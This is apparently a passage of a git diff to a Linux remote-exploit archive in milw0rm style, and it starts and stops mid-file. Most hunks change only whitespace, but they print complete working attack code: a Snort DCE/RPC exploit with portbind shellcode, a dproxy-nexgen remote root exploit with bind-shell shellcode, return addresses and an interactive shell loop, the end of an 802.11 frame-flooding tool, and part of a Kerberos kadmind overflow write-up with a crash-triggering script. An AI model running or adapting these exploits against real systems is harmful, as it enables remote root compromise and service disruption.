does not support transmitting control frames.\n"); + return -1; + } + + if (tx80211_setchannel(&in_tx, CHANNEL) < 0) + { + fprintf(stderr, "Error setting channel.\n"); + return 1; + } + + if (tx80211_open(&in_tx) < 0) + { + fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); + return 1; + } + + /* Initialized in_packet with packet contents and length of the packet */ + in_packet.packet = frame; + in_packet.plen = TOTAL_PACKET_LEN; + + printf("[sending packets]: about 10 a second\n"); + + while(i < 10000) + { + /* Transmit the packet */ + if (tx80211_txpacket(&in_tx, &in_packet) < 0) + { + fprintf(stderr, "Unable to transmit packet.\n"); + perror("txpacket"); + return 1; + } + i++; + usleep(100000); + } + /* Close the socket after transmitting the packet */ + tx80211_close(&in_tx); + + return 0; +} + +// milw0rm.com [2007-03-01] diff --git a/platforms/linux/remote/340.c b/platforms/linux/remote/340.c index 2416bdf66..b9ef90cb5 100755 --- a/platforms/linux/remote/340.c +++ b/platforms/linux/remote/340.c @@ -127,6 +127,6 @@ perror("Error with connecting. \n"); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); -} - -// milw0rm.com [1997-06-24] +} + +// milw0rm.com [1997-06-24] diff --git a/platforms/linux/remote/346.c b/platforms/linux/remote/346.c index 5d4ea7fa9..3d238d68c 100755 --- a/platforms/linux/remote/346.c +++ b/platforms/linux/remote/346.c @@ -450,6 +450,6 @@ int main(int argc,char *argv[]) sleep(30); return 42; } - - -// milw0rm.com [2001-12-20] + + +// milw0rm.com [2001-12-20] diff --git a/platforms/linux/remote/347.c b/platforms/linux/remote/347.c index 3d944f8f4..e86904662 100755 --- a/platforms/linux/remote/347.c +++ b/platforms/linux/remote/347.c @@ -801,6 +801,6 @@ echo "$retaddr, /* packet receive buffer + 0x90 */" echo "0x0182, 288 }," echo -echo finished. - -// milw0rm.com [2002-05-14] +echo finished. + +// milw0rm.com [2002-05-14] diff --git a/platforms/linux/remote/348.c b/platforms/linux/remote/348.c index e24ee8bdf..edc3f7167 100755 --- a/platforms/linux/remote/348.c +++ b/platforms/linux/remote/348.c @@ -1423,6 +1423,6 @@ sc_build_x86_lnx (unsigned char *target, size_t target_len, } return (tl_orig - target_len); -} - -// milw0rm.com [2002-05-14] +} + +// milw0rm.com [2002-05-14] diff --git a/platforms/linux/remote/359.c b/platforms/linux/remote/359.c index 83bc99118..2041fd95f 100755 --- a/platforms/linux/remote/359.c +++ b/platforms/linux/remote/359.c @@ -429,6 +429,6 @@ ret=ret-((TOP-sizeof(code))/4); } exit(0); -} - -// milw0rm.com [2004-07-22] +} + +// milw0rm.com [2004-07-22] diff --git a/platforms/linux/remote/3609.py b/platforms/linux/remote/3609.py index 2f4e234dd..54dc92a70 100755 --- a/platforms/linux/remote/3609.py +++ b/platforms/linux/remote/3609.py @@ -1,86 +1,86 @@ -#!/usr/bin/python -# -# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in -# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it. -# This code was tested against snort-2.6.1 running on Red Hat Linux 8 -# -# Author shall bear no responsibility for any screw ups caused by using this code -# Winny Thomas :-) - -import os -import sys -import time -from scapy import * - -# Linux portbind shellcode; Binds shell on TCP port 4444 -shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" -shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" -shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" -shellcode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" -shellcode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" -shellcode += "\x89\xe1\xcd\x80" - -def ExploitSnort(target): - # SMB packet borrowed from http://www.milw0rm.com/exploits/3391 - # NetBIOS Session Service - smbreq = "\x00\x00\x02\xab" - - # SMB Header - smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" - smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" - smbreq += "\x00\x08\x30\x00" - - # Tree Connect AndX Request - smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" - smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" - smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" - smbreq += "\x3f\x3f\x3f\x3f\x3f\x00" - - # NT Create AndX Request - smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" - smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" - smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" - smbreq += "\x63\x00\x00\x00" - - # Write AndX Request #1 - smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" - smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" - smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00" - smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" - smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" - smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" - smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00" - - # Write AndX Request #2 - smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" - smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee" - smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44" - smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" - # The following address overwrites RET and points into our shellcode - smbreq += struct.pack('' % sys.argv[0] - sys.exit(-1) - - print '[+] Sending malformed SMB packet' - ExploitSnort(target) - print '[+] Connecting to remote shell in 3 seconds...' - time.sleep(3) - ConnectRemoteShell(target) - -# milw0rm.com [2007-03-30] +#!/usr/bin/python +# +# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in +# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it. +# This code was tested against snort-2.6.1 running on Red Hat Linux 8 +# +# Author shall bear no responsibility for any screw ups caused by using this code +# Winny Thomas :-) + +import os +import sys +import time +from scapy import * + +# Linux portbind shellcode; Binds shell on TCP port 4444 +shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +shellcode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +shellcode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +shellcode += "\x89\xe1\xcd\x80" + +def ExploitSnort(target): + # SMB packet borrowed from http://www.milw0rm.com/exploits/3391 + # NetBIOS Session Service + smbreq = "\x00\x00\x02\xab" + + # SMB Header + smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" + smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" + smbreq += "\x00\x08\x30\x00" + + # Tree Connect AndX Request + smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" + smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" + smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" + smbreq += "\x3f\x3f\x3f\x3f\x3f\x00" + + # NT Create AndX Request + smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" + smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" + smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" + smbreq += "\x63\x00\x00\x00" + + # Write AndX Request #1 + smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" + smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" + smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00" + smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" + smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" + smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" + smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00" + + # Write AndX Request #2 + smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" + smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee" + smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44" + smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" + # The following address overwrites RET and points into our shellcode + smbreq += struct.pack('' % sys.argv[0] + sys.exit(-1) + + print '[+] Sending malformed SMB packet' + ExploitSnort(target) + print '[+] Connecting to remote shell in 3 seconds...' + time.sleep(3) + ConnectRemoteShell(target) + +# milw0rm.com [2007-03-30] diff --git a/platforms/linux/remote/3615.c b/platforms/linux/remote/3615.c index e7ae431d5..2a6751e3e 100755 --- a/platforms/linux/remote/3615.c +++ b/platforms/linux/remote/3615.c @@ -1,301 +1,301 @@ -/* dproxy-v1.c - * - * Copyright (c) 2007 by - * - * dproxy-nexgen remote root exploit (x86-lnx) - * by mu-b - Mar 2007 - * - * - Tested on: dproxy-nexgen (.tar.gz) - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! - */ - -#include -#include -#include -#include -#include -#include - -#define BUF_SIZE 512 -#define NOP 0x41 - -#define DEF_PORT 53 -#define PORT_DNS DEF_PORT -#define PORT_SHELL 4444 - -const u_char bndshell_lnx[] = - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" - "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" - "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" - "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" - "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xcd\x80"; - -#define NUM_TARGETS 2 - -struct target_t -{ - const u_char *name; - const int len; - const int zshell_pos; - const u_char *zshell; - const int fp_pos; - const u_long fp; -}; - -/* fp = objdump -D dproxy | grep "ff e2" */ -struct target_t targets[] = { - {"dproxy-nexgen (tar.gz)", - 512, 25, bndshell_lnx, 284, 0x08048cf9} - , - {"dproxy-nexgen (tar.gz, Debian stable)", - 512, 25, bndshell_lnx, 281, 0x08048cf8} - , - {0} -}; - -static int sock_send (int sock, u_char * src, int len); -static int sock_recv (int sock, u_char * dst, int len); -static void sock_send_udp (u_char * host, int port, u_char * src, int len); -static int sockami (u_char * host, int port); -static void shellami (int sock); -static void zbuffami (u_char * zbuf, struct target_t *trgt); - -static int -sock_send (int sock, u_char * src, int len) -{ - int sbytes; - - sbytes = send (sock, src, len, 0); - - return (sbytes); -} - -static int -sock_recv (int sock, u_char * dst, int len) -{ - int rbytes; - - rbytes = recv (sock, dst, len, 0); - if (rbytes >= 0) - dst[rbytes] = '\0'; - - return (rbytes); -} - -static void -sock_send_udp (u_char * host, int port, u_char * src, int len) -{ - struct sockaddr_in address; - struct hostent *hp; - int sock; - - fflush (stdout); - if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) - { - perror ("socket()"); - exit (-1); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (-1); - } - - memset (&address, 0, sizeof (address)); - memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); - address.sin_family = AF_INET; - address.sin_port = htons (port); - - sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); -} - -static int -sockami (u_char * host, int port) -{ - struct sockaddr_in address; - struct hostent *hp; - int sock; - - fflush (stdout); - if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) - { - perror ("socket()"); - exit (-1); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (-1); - } - - memset (&address, 0, sizeof (address)); - memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); - address.sin_family = AF_INET; - address.sin_port = htons (port); - - if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1) - { - perror ("connect()"); - exit (EXIT_FAILURE); - } - - return (sock); -} - -static void -shellami (int sock) -{ - int n; - fd_set rset; - u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n"; - - sock_send (sock, cmd, strlen (cmd)); - - while (1) - { - FD_ZERO (&rset); - FD_SET (sock, &rset); - FD_SET (STDIN_FILENO, &rset); - select (sock + 1, &rset, NULL, NULL, NULL); - if (FD_ISSET (sock, &rset)) - { - if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0) - { - fprintf (stderr, "Connection closed by foreign host.\n"); - exit (EXIT_SUCCESS); - } - printf ("%s", recvbuf); - } - if (FD_ISSET (STDIN_FILENO, &rset)) - { - if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0) - { - recvbuf[n] = '\0'; - sock_send (sock, recvbuf, n); - } - } - } -} - -static void -zbuffami (u_char * zbuf, struct target_t *trgt) -{ - int i; - u_char *ptr; - - ptr = zbuf; - memset (ptr, NOP, trgt->len); - - *ptr++ = 0x69; /* transaction id */ - *ptr++ = 0x69; - *ptr++ = 0x81; /* flags */ - *ptr++ = 0x80; - *ptr++ = 0x00; /* number of questions */ - *ptr++ = 0x00; - *ptr++ = 0x00; /* number of answers */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of authority rr's */ - *ptr++ = 0x00; - *ptr++ = 0x00; /* number of additional rr's */ - *ptr++ = 0x00; - - *ptr++ = 0xc0; /* compressed name &ptr+18 */ - *ptr++ = 0x18; - *ptr++ = 0x00; /* type = PTR */ - *ptr++ = 0x0c; - *ptr++ = 0x07; /* class = jmp short +0x07 */ - *ptr++ = 0xeb; - - *ptr++ = 0xff; /* ttl */ - *ptr++ = 0xff; - *ptr++ = 0xff; - *ptr++ = 0xff; - - *ptr++ = 0x01; /* data length = 488 bytes */ - *ptr++ = 0xe8; - - /* wire format name */ - for (i = 0; i < 2; i++, ptr += 0x7f) { - *ptr++ = 0x7f; - memset (ptr, NOP, 0x7f); - } - - *ptr++ = 0x02; /* padding */ - *ptr++ = NOP; - *ptr++ = NOP; - *ptr++ = 0x00; /* terminate name */ - - /* terminate buffer */ - ptr = zbuf + trgt->len - 1; - *ptr-- = 0x2e; - *ptr = 0x2e; - - memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell)); - - zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff); - zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8); - zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16); - zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24); -} - -int -main (int argc, char **argv) -{ - int sock; - u_char zbuf[BUF_SIZE]; - struct target_t *trgt; - - printf ("dproxy-nexgen remote root exploit\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); - - if (argc <= 2) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - if (atoi (argv[2]) >= NUM_TARGETS) - { - fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS); - exit (EXIT_SUCCESS); - } - - trgt = &targets[atoi (argv[2])]; - printf ("+Attacking to %s...\n", argv[1]); - - printf ("fp: 0x%x\n", (int) trgt->fp); - printf ("buf len: %d\n", trgt->len); - - printf ("+Building buffer with shellcode..."); - memset (zbuf, 0x00, sizeof (zbuf)); - zbuffami (zbuf, trgt); - printf (" done\n"); - - printf ("+Sending Payload..."); - sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); - printf (" done\n"); - - printf ("+Waiting for the shellcode to be executed...\n"); - sleep (1); - sock = sockami (argv[1], PORT_SHELL); - printf ("+Wh00t!\n\n"); - shellami (sock); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2007-03-30] +/* dproxy-v1.c + * + * Copyright (c) 2007 by + * + * dproxy-nexgen remote root exploit (x86-lnx) + * by mu-b - Mar 2007 + * + * - Tested on: dproxy-nexgen (.tar.gz) + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include +#include +#include +#include +#include + +#define BUF_SIZE 512 +#define NOP 0x41 + +#define DEF_PORT 53 +#define PORT_DNS DEF_PORT +#define PORT_SHELL 4444 + +const u_char bndshell_lnx[] = + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" + "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" + "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" + "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" + "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xcd\x80"; + +#define NUM_TARGETS 2 + +struct target_t +{ + const u_char *name; + const int len; + const int zshell_pos; + const u_char *zshell; + const int fp_pos; + const u_long fp; +}; + +/* fp = objdump -D dproxy | grep "ff e2" */ +struct target_t targets[] = { + {"dproxy-nexgen (tar.gz)", + 512, 25, bndshell_lnx, 284, 0x08048cf9} + , + {"dproxy-nexgen (tar.gz, Debian stable)", + 512, 25, bndshell_lnx, 281, 0x08048cf8} + , + {0} +}; + +static int sock_send (int sock, u_char * src, int len); +static int sock_recv (int sock, u_char * dst, int len); +static void sock_send_udp (u_char * host, int port, u_char * src, int len); +static int sockami (u_char * host, int port); +static void shellami (int sock); +static void zbuffami (u_char * zbuf, struct target_t *trgt); + +static int +sock_send (int sock, u_char * src, int len) +{ + int sbytes; + + sbytes = send (sock, src, len, 0); + + return (sbytes); +} + +static int +sock_recv (int sock, u_char * dst, int len) +{ + int rbytes; + + rbytes = recv (sock, dst, len, 0); + if (rbytes >= 0) + dst[rbytes] = '\0'; + + return (rbytes); +} + +static void +sock_send_udp (u_char * host, int port, u_char * src, int len) +{ + struct sockaddr_in address; + struct hostent *hp; + int sock; + + fflush (stdout); + if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) + { + perror ("socket()"); + exit (-1); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (-1); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); +} + +static int +sockami (u_char * host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int sock; + + fflush (stdout); + if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + perror ("socket()"); + exit (-1); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (-1); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1) + { + perror ("connect()"); + exit (EXIT_FAILURE); + } + + return (sock); +} + +static void +shellami (int sock) +{ + int n; + fd_set rset; + u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n"; + + sock_send (sock, cmd, strlen (cmd)); + + while (1) + { + FD_ZERO (&rset); + FD_SET (sock, &rset); + FD_SET (STDIN_FILENO, &rset); + select (sock + 1, &rset, NULL, NULL, NULL); + if (FD_ISSET (sock, &rset)) + { + if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0) + { + fprintf (stderr, "Connection closed by foreign host.\n"); + exit (EXIT_SUCCESS); + } + printf ("%s", recvbuf); + } + if (FD_ISSET (STDIN_FILENO, &rset)) + { + if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0) + { + recvbuf[n] = '\0'; + sock_send (sock, recvbuf, n); + } + } + } +} + +static void +zbuffami (u_char * zbuf, struct target_t *trgt) +{ + int i; + u_char *ptr; + + ptr = zbuf; + memset (ptr, NOP, trgt->len); + + *ptr++ = 0x69; /* transaction id */ + *ptr++ = 0x69; + *ptr++ = 0x81; /* flags */ + *ptr++ = 0x80; + *ptr++ = 0x00; /* number of questions */ + *ptr++ = 0x00; + *ptr++ = 0x00; /* number of answers */ + *ptr++ = 0x01; + *ptr++ = 0x00; /* number of authority rr's */ + *ptr++ = 0x00; + *ptr++ = 0x00; /* number of additional rr's */ + *ptr++ = 0x00; + + *ptr++ = 0xc0; /* compressed name &ptr+18 */ + *ptr++ = 0x18; + *ptr++ = 0x00; /* type = PTR */ + *ptr++ = 0x0c; + *ptr++ = 0x07; /* class = jmp short +0x07 */ + *ptr++ = 0xeb; + + *ptr++ = 0xff; /* ttl */ + *ptr++ = 0xff; + *ptr++ = 0xff; + *ptr++ = 0xff; + + *ptr++ = 0x01; /* data length = 488 bytes */ + *ptr++ = 0xe8; + + /* wire format name */ + for (i = 0; i < 2; i++, ptr += 0x7f) { + *ptr++ = 0x7f; + memset (ptr, NOP, 0x7f); + } + + *ptr++ = 0x02; /* padding */ + *ptr++ = NOP; + *ptr++ = NOP; + *ptr++ = 0x00; /* terminate name */ + + /* terminate buffer */ + ptr = zbuf + trgt->len - 1; + *ptr-- = 0x2e; + *ptr = 0x2e; + + memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell)); + + zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff); + zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8); + zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16); + zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24); +} + +int +main (int argc, char **argv) +{ + int sock; + u_char zbuf[BUF_SIZE]; + struct target_t *trgt; + + printf ("dproxy-nexgen remote root exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc <= 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + if (atoi (argv[2]) >= NUM_TARGETS) + { + fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS); + exit (EXIT_SUCCESS); + } + + trgt = &targets[atoi (argv[2])]; + printf ("+Attacking to %s...\n", argv[1]); + + printf ("fp: 0x%x\n", (int) trgt->fp); + printf ("buf len: %d\n", trgt->len); + + printf ("+Building buffer with shellcode..."); + memset (zbuf, 0x00, sizeof (zbuf)); + zbuffami (zbuf, trgt); + printf (" done\n"); + + printf ("+Sending Payload..."); + sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE); + printf (" done\n"); + + printf ("+Waiting for the shellcode to be executed...\n"); + sleep (1); + sock = sockami (argv[1], PORT_SHELL); + printf ("+Wh00t!\n\n"); + shellami (sock); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2007-03-30] diff --git a/platforms/linux/remote/3698.txt b/platforms/linux/remote/3698.txt index e81b13925..cbd8b4f2c 100755 --- a/platforms/linux/remote/3698.txt +++ b/platforms/linux/remote/3698.txt @@ -1,145 +1,145 @@ -Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability - - -The Issue: -Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service - -The Versions: -krb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ ) -krb5-server-1.4.3-5.1 (Latest version from Fedora yum update) - -The Environment: -Linux Fedora Core 5 x86_64 bit - -The Overview: - -There is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration -of principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker -the possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can -also be used as a denail of service against kadmind. - -root 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc -root 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind - -To trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket -generated, the user therefor must be or have access to an admin account that can access thre remote kadmind -service, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access -to the service to kill it or gain root access and as such should be treated as critical. - -A trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it -by default to send in shellcode and return addresses. To get around that we modify the client source code a bit to -honour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it -encounters these strings ;) - - -Following is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read - -/* krb5-1.5.1/src/lib/kadm5/logger.c - -static int -klog_vsyslog(int priority, const char *format, va_list arglist) -{ -char outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE]; -char *syslogp; - -strncpy(outbuf, ctime(&now) + 4, 15); -cp += 15; - -syslogp = &outbuf[strlen(outbuf)]; - -vsprintf(syslogp, format, arglist); - -*/ - - -By exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including: - -add_principal -delete_principal -modify_principal -change_password -get_principal -... and on..... - -Another nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting -a payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind: - -########## - -#!/bin/bash -ADDIT="get_principal" -ATTACK="cr4yz33_h4xx0r" -KADMIN="/usr/kerberos/sbin/kadmin" -KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`" -PRINCIPAL="root/admin@OPEN-SECURITY.ORG" -TARGET=coredump.open-security.org -TRIGGAH="`perl -e 'print "A" x 5000'`" - -$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT -pw $ATTACK $TRIGGAH" - -########## - - -After running this script with various sized buffer values, we get faults in the following locations: - -// With 2000 A's // -#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6 -#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 -#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, -format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7ffffdb40e60) -at logger.c:854 -#3 0x4141414141414141 in ?? () -#4 0x4141414141414141 in ?? () -#5 0x4141414141414141 in ?? () -.... - - -// With 5000 A's (On the Fedora version) // -#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6 -#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6 -#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6 -#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5 -#4 0x4141414141414141 in ?? () -#5 0x4141414141414141 in ?? () -.... - - -// With 30000 a's // -#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6 -#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6 -#2 0x0000003a2ed44294 in 